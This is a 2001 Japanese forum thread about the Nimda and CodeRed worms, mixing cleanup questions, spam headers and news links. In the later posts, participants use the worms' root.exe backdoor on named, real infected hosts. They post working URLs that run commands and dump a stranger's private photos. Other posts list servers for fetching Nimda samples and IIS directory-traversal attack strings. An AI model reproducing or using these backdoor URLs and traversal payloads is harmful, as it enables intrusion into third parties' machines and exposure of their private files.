そう言えば大手家電Ｈ社さんはつい最近までWindows3.1のインターフェース（W3.1やNT3.5とか）で統一してたんだってね（ｗ

>151
深く激しく同意

viking.combination.com
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

まだまだ感染中。

http://www.clubtgp.com/freehosting/teeny/kat/index.htm

>>75ご登場の消防にみせてやりたい（ｗ

思うんだが、ニムダに何度も感染しているようなヤツって、おそらくこの１０月１６日には絶叫する羽目になると思うんだが・・。

みんな忘れているのかもしれないが。

>>157
Sircamかな？
10/16にCドライブの全てのファイルとディレクトリを消去する。

>>157の言っているのがSircamだとしたら、
日本語環境の日付形式(Y/M/D)では発症しないんじゃ
なかったっけ？

にしてもまだSircamが残っているのが凄いよな…

復活。

http://www.yy.t.u-tokyo.ac.jp/fujiwara/news.html

なんだかカッコイイ（ｗ

>>160
ここもパスワード付きバックドアという妙な仕様だな（ｗ

The attachment, which arrives within the mail is almost the
same as TrendMicro publish to fix the damages of the Nimda
worm, the only difference between them is the file extension
(FIX_NIMDA.com (original) and FIX_NIMDA.exe (trojan horse)).

↓トレンドマイクロもココに赤文字で書いてる（ｗ
http://inet.trendmicro.co.jp/virusinfo/vbc_vinfo.asp
Nimdaの修復ツール騙る嘘つきトロイだって。。。
色々出てくるね（ｗ
まだ、データベースに詳細出てないけど。

>>161
流行ってるのかな？（ｗ
http://210.105.22.10/
http://114.c210-85-64.ethome.net.tw/
http://211.96.111.55/

>>162
これ入手したら、気にくわないやつに送りつけるだけで（ｗ

>>http://211.96.111.55/
うちでは最後のCodeRedがコイツだった。

www.telook.co.jp
ってなんだべ。
初期のころから１０／２まで間欠的にNimdaとばしてくれてる

>>165
>>>http://211.96.111.55/
> うちでは最後のCodeRedがコイツだった。

パスワードのバックドア、ニムダにさっどまいんど＆赤コード。フルコースか？（ｗ

>>162
これについてか、昨夜ＶＢのアップデートが出てるね。

のうとん先生はまだの様子。

うっ。

http://www.miruku.co.jp/index.html

---
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>

<!-- sorosoro naosouyo... meiwakudayo... -->

（藁

もしかしてアクセスカウントアップの早道ってニムダ感染だったりして・・。

>>171
どころか、見に来てほしいコンテンツがポートスキャンで召還しにくるようになったりして・・。

>>172
見に来ないとクラックするぞｺﾞﾙｧとかポートたたくんだったりして・・。

>>173
これが本当のプッシュ（圧力）コンテンツだったりして・・。

シヴイ・・。

http://www.lac.co.jp/security/news/attack/index.html

う〜む・・。

FBIがセキュリティー問題のトップ20を公表
http://japan.cnet.com/News/2001/Item/011003-8.html?mn

>>169

あーあー、エスカレートしてるし(^^;

>>169
（藁

質問！
ＮＡＴeでルータ経由でインターネットに接続した時・・
ＰＣでパッチ未適用ＩＩＳ５がうごいていたらnimdaに感染しますか？

>>179
Nimudaが攻撃するセキュリティホールの一つを塞いだにすぎないのであれば
感染する可能性がまだ残っている。

すいません・・
書き方が足りませんでした

＞ＮＡＴeでルータ経由でインターネットに接続した時・・
＞ＰＣでパッチ未適用ＩＩＳ５がうごいていたら（ＩＥは未使用）
インターネットから直接nimdaに感染しますか？

↑名前欄の番号まちがえましたｍ（＿＿）ｍ

ポート80をIISにまわすようになってたら感染するのではないか

Coderedに過去に感染していた場合レジストリが書き換えられてバックドアが開いているのでそのうち感染する。
Coderedで書き換えられたレジストリを修復してバックドアを塞いでいる又はCoderedに運良く感染していなかった場合は
Nmudaのバックドアを利用したアタックでは感染しない。

Nimudaではない。Nimdaだった。。。。

>>180 >>183 >>185
ありがとうございました

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From [email protected] Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

ttp://www.clubtgp.com/freehosting/nature/gallery.htm
↑
ここって何に感染してるのですか？
ノートン先生で修復できなかったんですけど。

>>188
ソースが見つからないなぁ…
何なんだろう？
しかしこのページって…

>>188
http://www.symantec.com/region/jp/sarcj/data/j/js.exception.exploit.html

>>190
ありがとうございます

教えてください・・
ＩＩＳ４／５でセキュリティパッチを入れておらず、他の感染サーバから感染するとき
コードレッド2によるバックドアがあるときとないときで
なにかかわるのでしょうか？

>>192
バックドアがあるとき

よりスムーズに感染する

ないとき

一家が暗くなる（大阪限定

>>193
>一家が暗くなる（大阪限定

こちらは、東京なので平気ということなのでしょうか？

> >>193
> >一家が暗くなる（大阪限定
>
> こちらは、東京なので平気ということなのでしょうか？
ワロタ。

東京の人も、新大阪駅で在来線の改札に回ってみるといいよ。

会社でsunosのsolarisというＯＳを使ってるのですが
ここもNimdaにやられてしまいました。
そのＰＣにはWindowsも入っていますが、そちらは駆除済み
なのですが、solarisという方にはまだたくさんいるんです。
駆除できる方法、solaris系の情報、知っている方いたら
なにか教えて下さい。

>>196
solarisで感染（っつーかコピペっつーか）したのは、Windowsで共有しているドライブだろう。
Windowsからそのドライブもウイルススキャンしてはどうか。

solarisでNimdaが動作した実績はないだろう（あたりまえだが）。あったら知らせてくれ。
ただしsolaris上で感染したファイルをWeb公開すれば外部からは感染したのと同じように見える。

>>197
ちなみにMacで同じようになったときに、その共有ドライブをMacのウイルススキャンソフト（最新パラメータ）でスキャンしてもしてもし検知しない。
が、そのドライブの感染ファイルをWindowsで叩くとしっかり感染する。
（このへんの事情は空栗鼠でも同じだろう）

ニムダはWindowsのウイルススキャンソフトでスキャンしよう。

>>195
>> >>193
> > >一家が暗くなる（大阪限定
> >
> > こちらは、東京なので平気ということなのでしょうか？
> ワロタ。
>
> 東京の人も、新大阪駅で在来線の改札に回ってみるといいよ。

より遠方のひとは、心斎橋本店まで足をのばし、蒸かす前のものを梱包してもらうとよいだろう。
個人的にはいしいひさいちの版が好きだ。

WINMXでは感染しないの?
友人が語るに自分の感染源はMXだといって
はばからないんですが。。。

>>200
なにを持ってWinMXで感染した、というのかは疑問が残るが、
いままで報告されたニムダの挙動を聞く限り、WinMxでMP3を交換していた
だけで、WinMXを使用していただけで感染したとは考えにくい。

しかしそいつが怪しげなワレ物や、炉裏ムービーetcにまで手を出していたならその限りではない（ｗ

昨日感染した。鬱だ。

で・・
バックドアがないと、どうなるのでしょうか？

>>202
もう少し流行に敏感になりましょう。

リカバリーできない。
winspool.drvが無いと表示される。

197 198
ありがとうございます。
自分のＰＣじゃないんで、ソラリス自体がよくわかってないのですが
Windowsのウイルススキャンソフトでやってみます。

>>205
ちょっとまった。

駆除せずいきなりリカバリーしようとしてるのかい？

>>207
学校で先ほどを駆除ソフトをＤＬしたばかりです。

よくわからん・・。

お昼にノートン先生の更新があったぞ。

196,206です。
Windowsの方ではチェックしました。
クラリスの中では大丈夫との事でしたが、
実はCADデータをwinNTの方に変換したりする時、フォルダごと
変換にかけるとその時にNimdaもくっついてきて、winがまた感染、、なんて
ことになるそうです。
面倒でも、ファイルを1つづつ変換すれば良いのですが、量があるので
そういう訳にもいきません。
いちおうウィルスソフトを常駐させておこうという話になったのですが、
ちょっと不安です。
ソラリスに電話しても駆除ツールとかは無いそうです。
やっぱりウィルスソフトを信用してやるしかないでしょうか？

長文ですみません。

なぜかwinから駆除しても、ソラリスには残ってます。

なんつうか、実害感じるまで感染し放題だったのか？

>>212
ソラリス側から削除すればいいのでは？

>>213
そういうものなんだろう。
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

>>214
んだ。

.eml
readme.exe

これを検索して全部削除することはできないか？

あとは
<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
をぐれっぷだ。

>>214
そらりすなんか使うから、ダメなんだ。フォーマット＆W2kインストール（ｗ

ソラリスって検索しても、その検索結果からは
削除できないそうなんです。
ソラリスから*.emlを消すには、今のところ
フォルダ一個一個を開けて探して削除していく事しか
なさそげです。
それも気が遠くなりそうな数です。
うぅ、マイナーなＯＳでも相談にのっていただいて
むちゃくちゃ嬉しいです。

>>218
そこをWindowsでマウントしてWindows側から検索するとどうだ？

>>219
んー、ちと事情が違うかもしれないが、おれの場合SAMBA共有フォルダ
にNimdaがいると共有フォルダ開いた時点でバスターが検出して
なにも出来ないんだけどね。
だが、少なくともそこにウィルスがいること自体はわかると思うんだが。

>>218
ソラリスって、locateコマンドってないの？

考えてみりゃ、そらりすってWindowsのファイルサーバやってるケースは多いよな。

もしかすると大半がそういう用途かもしれない。

875 ：追加 ：01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

http://www.zdnet.co.jp/news/0110/04/e_mssecurity.html
Microsoftは，同社製品のセキュリティを懸念する声に対応す
るため，セキュリティプログラムを立ち上げた。同社はこのプログラ
ムで，パッチをまとめるツールの提供や，セキュリティアップデート
の自動化といったセキュリティ対策を顧客に提供する。

今更偉そうに言える事か？

>>220
find じゃだめかな？

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From [email protected] Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

駆除ソフトの
FIX_NIMDA v1.23ってこれ以上でてますか？

http://www5.justnet.ne.jp/%7Ettp/

Windows.NET Server英語版中間ビルド(Build 3541)リリース（ダウンロード可能）のお知らせが来た。

大丈夫なんかいな、いや、マジで。

>>226
かねてから思っていたんだが、よくこのテの単発駆除ソフトなんか使うよなぁ。
安易に薦めるのも無責任だ。

動作保証がない上に、何をどう駆除するのか明確になっていなくて、駆除に失敗してファイルを破壊しても泣き寝入りだ。
アップデートが出ても過去の駆除ソフトが弄ったファイルは修復しないどころか、誤診しかねない。
当然ながら他のウイルスが紛れ込んでいても見て見ぬふり。
しかもバックドアは駆除しない。

しかも中にはスキャンするだけのものを実行して、英語メッセージを読み違えて発見を駆除と思い違いしているのまでいる。

>>226は単発駆除ソフトの収集マニアであることを祈る。

>Microsoftは，同社製品のセキュリティを懸念する声に対応す
>るため，セキュリティプログラムを立ち上げた。同社はこのプログラ
>ムで，パッチをまとめるツールの提供や，セキュリティアップデート
>の自動化といったセキュリティ対策を顧客に提供する。

アップデートの自動化こそヤバイってきづいてないのかな？

でも、MSの製品がセキュアになってしまったら、Linux厨が困るよね。
実は、今までｳﾏｰ具合に棲み分け出来てたんだと思ったり。

LinuxはLinuxで、最近はやりの一発インストールLinuxで設定はみんなデフォルトのまんま、なんてのをよく見るしなぁ・・。

win厨の自作自演は醜いと思ったり。

>232
でもそういうマシンは公開したらすぐ手動巡回の方々にやられますがな。
世の中にはマメな人が多いよね、ホント(w

218です。
ソラリスの中にある*.emlが千数百個あるのがわかりました。
で、消すのはあきらめました。
とりあえず、変換時にwinNTに感染しないようにノートンを
常に働かせておくことになりました。
小さい会社なので、セキュリティ、ウイルスソフトなんてのは
入れて無かったんです。危機感が無かったので、、。

レスくれた方々、ありがとうございました。

>>235
う。
これを読んで一層の危機感を募らせてしまった私は一体どうしたらよいだろーか。

>>223
http://www.microsoft.com/technet/mpsa/start.asp
[Microsoft Personal Security Advisor]
とりあえず試験サイトか？[C:D:E:F:G:をNTFSにしなさい、って余計なお世話だ。]

>>237
「ScanNow」中。
MSのサイトにHDDの中をまさぐられるのは気色悪いですなぁ・・。

>>237
ダウンロードを要求されたので拒否しちまった（ｗ

>>234
格言
「最低でもTCP-Wrapperの設定してからケーブルつなげ」

再びすみません。
今、ソラリスの中を見てみたところ
顔文字のフォルダが勝手に作られていました。(^.^)←こんなフォルダ名です。
しかもよくよく探してみるとかなり大量に。。
あと、中には「*.cache」と「*.state」というファイルがどこのフォルダにも
コピーされていました。
たぶんcache、stateが拡張子だと思うんですが、拡張子辞典で調べても
該当する物はありませんでした。
それでとりあえず消す事になったのですが、これは
ソラリスが感染した、って事になるんでしょうか？

>>236
お見事。

萎え。

「*.cache」と「*.state」はどうやら必ず居るものらしいです。
ただ、顔文字フォルダだけが作られたようでした。

本当、お騒がせ致しました。。

Solaris無料化の弊害を見た気がする。

>>244
ちょっと同感。

でも、Windozeて決してフリーじゃないのにないのに。

ここを読んでいたら、Solarisって、わかりにくくてマイナーで参考書の少ない、むずかしくもめんどくさいOSに思えてきてしまった・・。

>>246
それ全部正解。今ごろ気づいたのか？

>>247
なあんだそうだったのか、ほっとしました(^-^)

検証用にNimdaほしいんだけどどっかないかな？

>>249
このへんかな。

http://210.102.151.10/
http://210.103.173.1/

>>249

web鯖立ててしばらく置いといたらなんぼでも・・・・・（以下略）

>>251
http://www2.o-hara.ac.jp/

そうなったらしい・・。

きちんとしているのか、いないのか・・。

http://www.kokusai2.u-keiai-sakura.ac.jp/NimdaFAQ.htm

うーん、ＩＥ６にして変な添付ファイルも開いていないのに
何度も何度も感染する。
何故だろう。こんな漏れみたいな人って多くないのかな？

>>250
ゲットできました！サンクス！

>>254
だからIE6は自動感染することがあるとMSのサイトに書いてあるだろう。

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品
InternetExplorer
以下のバージョンをインストールしているシステムにおいて、Internet Explorer の Web ブラウザコントロールを利用する全製品
：
：
MicrosoftR Internet Explorer 6 (以下略)

---

だれだ、IE6は感染しないなどとデマ流したヤツは。

>>256
デマは
---
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>>560
マイクロソフトのサイトにいきInternet Explorer を6.0にアップしたほうが良い
---
コイツが流した。

>>162
修復ツールカタリウイルス、名前が付いたね。

http://www.trendmicro.co.jp/virusinfo/isp/virusency/default3.asp?VName=TROJ_JESTRO.A

Windows updateのDLが遅い…
みんないっせいにアップデートしてるのかな

こっちはnimdaに関係なくただOS入れてるだけなのに…

>>256
うーん、でもこれって最小構成だったらやばいってことでしょ。
最小構成にした記憶なんてないんだが…

はぁ、鬱だ。

>>260
ﾊｧ?

>>260「自分で」最小構成「にしたとき」なんてＭＳのサイトに書いてないぞ。

>>260
ISS放置してないだろうな？

勝手になるんだったよな？＞ＩＥ６＜最小構成

Miss
×ISS
○IIS

IE6はOSによってインストールタイプ選択項目が違うみたいだ

うひゃ、今調べてみたっけWIN2000の場合は自動的に最小構成
になってしまうんだね。
変なレスしちゃったみたいだ。スマソ

>>266
自動的にIISが入ることもないとは言えんぞ（ｗ

WINMXは無事なんですかぁ
よかった(w

WINMXはだいじょうぶなのか。
よかったよかった。

>>268
割れと炉裏はダメだぞ（ｗ

すいません。
厨房全開ですね....

そうか、学生さんいらっしゃい、の時間か。

>今調べてみたっけWIN2000の場合は自動的に最小構成
になってしまうんだね。

なんないよ。Readmeには標準構成でも最大構成でもないとかいてるだけで
最小構成とは書いてない。OutlookExplressが入る時点で最小構成ではなくなる

>>250
nimdaとは直接関係ないが

IE(5以降)を起動
↓
「ファイル」-「開く」
↓
http://210.103.173.1/ と入力
↓
「Webフォルダとして開く」にチェック
↓
OKをクリック
↓
(ﾟ∀ﾟ)ｱﾋｬﾋｬ

>>274
深い・・実に深い・・。

ニムダにやられないように、IE5.5sp2にアップデートすると、デフォルトページがMSNに変更される。
MSNがウイルス源だってのに、どういうことか？ずっこけました。やっぱ犯人はMicrosoftでは？
TrendMicroもMicroつながりでつるんで一儲け？？

http://3535682771/scripts/root.exe?/c%20dir%20%63%3A%5C

>>277
つーか、
ftp://3535682771/

ﾜﾗﾀ

http://3535682771/index.html

で、ここの管理人はまだ気付いてないわけ？(^^;

age

会社でパソやサーバがNimda感染したとき、感染ルートの追及方法って・・

１．ＩＩＳがやられたならＩＩＳのログを見る
２．〜.emlの所有者を見る（マイコンピュータ等を使用する）

でよいのかしら？
ほかに良い手はありますか？

タイムスタンプでソート

かつての感染サイトだが、なんだこれ・・。

http://61.136.189.106/

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 367
これって亜種？

>>285
んー、間違い探しみたいだがどこが亜種じゃないのと違う？

http://3d75adaf.t-net.ne.jp/P8210065.JPG
これ、ヤバくねぇ？
C:のあかねってフォルダにあったjpegをwwwrootにコピーしたんだけど
柱のあたりにデストロイヤーみたいな顔が・・・

>>287

それはともかく、 ρ(^-^)なんかいるね
http://3d75adaf.t-net.ne.jp

あかねちゃん萌え

>>288
そりゃいるさ。
感染してるのわかってたからドライブ覗いてみたんでしょ？

>>290
ここはのぞき見ｽﾚです、ってか（ｗ

>>287
つーか、いちいち移さなくてもだな、

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8210065.JPG

>>289
>あかねちゃん萌え

ハイハイ、萌え萌え。
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8040002.JPG

>>292
ナルホド。そうやればいいんだ。
おれはいちいちwwwrootかftprootに移してたよん。

>>294

遊び場減らさないように精進してくれたまえ（ｗ

つーか今ここ重いな（ｗｗ

これってセキュ穴埋まってるってことだよな。

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c%20ver

>>293
おやじ萎えぇ（句

ふむ、これは山手線のサハ２０４−２６だな（だからなんだ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8200031.JPG

>>296
クリーンな環境にパッチあてないと意味はない。

みんな、もしかしてあかねフォルダ漁ってる？(w

>>299
完全駆除されちゃったら、再感染しないので大事に使わないとな、とφ(.. )　めもめも

>>300
漏れはc:\中国写真（ｗ

From :
[email protected] [email protected]
To : [email protected]
Subject : Optin message 3
Date : *****
MIME-Version: 1.0
Received: from [128.121.214.236] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from s0261@localhost)by [email protected] (8.8.8pmg/8.8.5) id FAA98861for :include:/usr/home/s0261/pmgs/users/optin2savebig/delivery/1002328394.22065/rblk.2170; Sat, 6 Oct 2001 05:00:38 GMT
From [email protected] Fri, 05 Oct 2001 22:11:13 -0700
Message-Id: <[email protected]>
X-Info: This service does not permit Unsolicited Commercial Email.
X-Info: To report abuse, contact [email protected]
X-PMG-Userid: optin2savebig
X-PMG-Msgid: 1002328394.22065
X-PMG-Recipient: [email protected]

ああ、ネズミなんてどうでもイイからぁ（ｗ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+\
やめれｗ

そうそう、これがあかねちゃんがウチに来た時のアクセスログね。

3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:05 +0900] "GET /scripts/root.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:06 +0900] "GET /MSADC/root.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:07 +0900] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:08 +0900] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:08 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:09 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:10 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:11 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:12 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:13 +0900] "GET /sc HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:14 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:14 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:15 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:17 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:18 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:19 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215

>>304
ねずみだかフィレットだかしらないけど、かわいいな(w

>>306

おさそいがあったのか。じゃあしょうがないな（ｗ

>ねずみだかフィレットだかしらないけど、かわいいな(w

肩のホクロがな（ｗ

テレ東もＮｉｍｄａにやられたのかな。
http://news.2ch.net/test/read.cgi/news/1002358690/

>>308

つーか(--;

ftp://shop.tv-tokyo.co.jp/

>>309
nimdaなのか？

>>309
ちがうだろ。鯖はIISではない。

>>311のレス先は>>310に訂正

>>311
だよなあ。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=shop.tv-tokyo.co.jp&submit=Examine
OSはIRIXでWeb鯖はApacheかな？

Server: Rapidsite/Apa-1.3.14 (Unix) FrontPage/4.0.4.3 mod_ssl/2.7.1 OpenSSL/0.9.6
と出ました。
by Proxy伝説

nimda の来襲もサーバーによっては、日に１００件程度に減っているのもあるようだけど、
うちのapacheサーバーには、まだ日に３０００件もきているよ。
ほとんど61.xxx.xxx.xxxからのもの。
国内は、結構対策が進んでいるけど、韓国、台湾などの対策がおくれているのかい？

>>315
http://www.security.nl/misc/codered-stats/geodist.gif
台湾、中国特に韓国は元々Codered感染者がケタ違いに多かった。
既に2ヶ月放置しているぐらいだから
残念だけどＩＰの近いユーザーはアタックも今後減らないと思う。

誰か穴ふさぎ回れ！

http://www.hamq.jp/i.cfm?i=bigsunday

The firewall has blocked Internet access to your computer (HTTP) from 211.56.219.130 (TCP Port 1133) [TCP Flags: S].
ここにnimda発見！詳細ください。

>>319
http://211.56.219.130/scripts/root.exe?/c%20net%20send%20*%20%22Your Machine is infected by CodeRed%22

たのむからこの期に及んで感染しないでくれ・・。

感染　コマツ電子金属　アニュアルレポート
http://www.komsil.co.jp/
http://www.komsil.co.jp/office/annual-t.htm

「レイキ」宇宙エネルギーによるハンドヒーリング
http://www.mnet.ne.jp/~satoken/index.htm

ここも
dns1.sunsystems.gr.jp も　ニムダくんたとばしてくれる。
webは別のマシンでやられていないようにみえる。

内側のPCで感染しているヤツがあって
dns1のIPははNATかマスカレードで使用されてるんだろうと思ふ

＞情報通信（電話・ＬＡＮ・電気）機器の販売・施工・保守
が事業内容なんだけど、ウイ対策も保守のうちとしてやってくれ

>>317
自分でやれ。攻撃鯖は攻撃されたヤツにしかわららんから「誰か穴ふさぎ回」るのは不可能。

>>322
表に鯖立ててると厨房君でも分かるからすぐ注意されてなおるのだろうが、Webも立ててないようなヤツからだと、感染自覚もないだろうから駆除の期待は薄いな・・。

9/20 ごろ感染して
今日段階で再開してないサイトあるね。

穴ふさいでも、emlダウンのスクリプト残ったまま再開
したり、（このケース意外に多い）
逆にコンテンツだけ書き戻して再開したり

するよりは、よほどマシか。


http://headlines.yahoo.co.jp/hl?a=20011008-00000001-vgb-sci
セキュリテイで商売しながらこんな醜態さらすとこよりはだいぶマシ

>>325

うわ、こりゃカッコワルイな・・。
まだ閉鎖中だし・・。
http://matrix.baltimore.co.jp/

ところで、ここも閉鎖中なんだけど、なんか関係あるのかな？
http://people.site.ne.jp/
改竄情報を提供してるサイト

http://www.mnet.ne.jp/~satoken/index.htm

って IISじゃないのにね。
コンテンツ作成用の環境が汚染されてて
きずかずにそのまま鯖にUP
ってことか

>>326
盛大にやられてますな・・。

https://www.netsecurity.ne.jp/article/1/2976.html

CodeRedとNimdaに感染し
そもそもそれ以前に
アノニftpで書きこみ放題でありながら
見た目原型をたもってる、
現在もいじられた html のまま運用中の
www.miruku.co.jp の固さをみならう必要があるな。。。。

この　みるく　の事例から
最強の防御策は、
”あけぱなしにして、第三者が自由に書き換え可能にしておくこと”
であることがわかる。

>>330

御意。

ハッカー志願者でも、ここまでオープンだと改竄しても楽しくないのだろう。

昔西洋人が古来の日本家屋にはカギがないと驚いたそうだが、それと同じ防犯システムだな(^^;

それにしても・・。

IEのようなブラウザでみてくれ。
ftp://shop.tv-tokyo.co.jp/10k.html

>>327
粘着ｼﾞｻｸｼﾞｴﾝ君がウルサイから突っ込まないで（ｗ

>>325

こんなふうにされちゃったのね（ミラー）
http://people.site.ne.jp/mirror2/2001.10.08/training.baltimore.co.jp/index.html

>セキュリテイで商売しながらこんな醜態さらすとこよりはだいぶマシ

>>334
連続改竄のうち、１件目はこんなだって（ミラー
http://people.site.ne.jp/mirror2/2001.10.07/matrix.baltimore.co.jp/index.html

なんかかっこいいぞ

Hey Admin, JShalom got root?

gifアニメもあるし。

http://osaka.1000e.net/

ここってなんか変なの。
日本語ページに飛んでもイマイチ理解できない。
全ページ感染してるし。

>>337
ftp://osaka.1000e.net/
ほんとだ

そんな事より>>１よ、ちょいと聞いてくれよ。スレと全然関係ないんだけどさ。
このまえ、msn行ったんです。msn。
そしたらなんかNindaがめちゃくちゃいっぱいで見れないんです。
で、よく見たらなんかリンクがはってあって、Nindaの配付は終了しました〜、とか書いてあるんです。
もうね、アホかと。馬鹿かと。
お前らな、Ninda如きで毎日見ているmsnにわざわざ来てんじゃねーよ、ボケが。
Nindaだよ、Ninda。
なんかサーバ管理者とかもいるし。全社挙げてmsnか。おめでてーな。
よーし部長のパソコンも感染しちゃったぞ〜、とか言ってるの。もう見てらんない。
お前らな、ウイルスバスターやるからそのパソコン空けろと。
M$ってのはな、もっと殺伐としてるべきなんだよ。
サポートで電話した奴といつ喧嘩が始まってもおかしくない、
刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、昨日、やっと見れたかと思ったら、何か飛ばされて、MSN Explorerをご利用ください、とか書いてあるんです。
そこでまたぶち切れですよ。
あのな、MSN Explorerなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、MSN Explorer、だ。
お前は本当にMSN Explorerを使わせたいのかと問いたい。問い詰めたい。小１時間問い詰めたい。
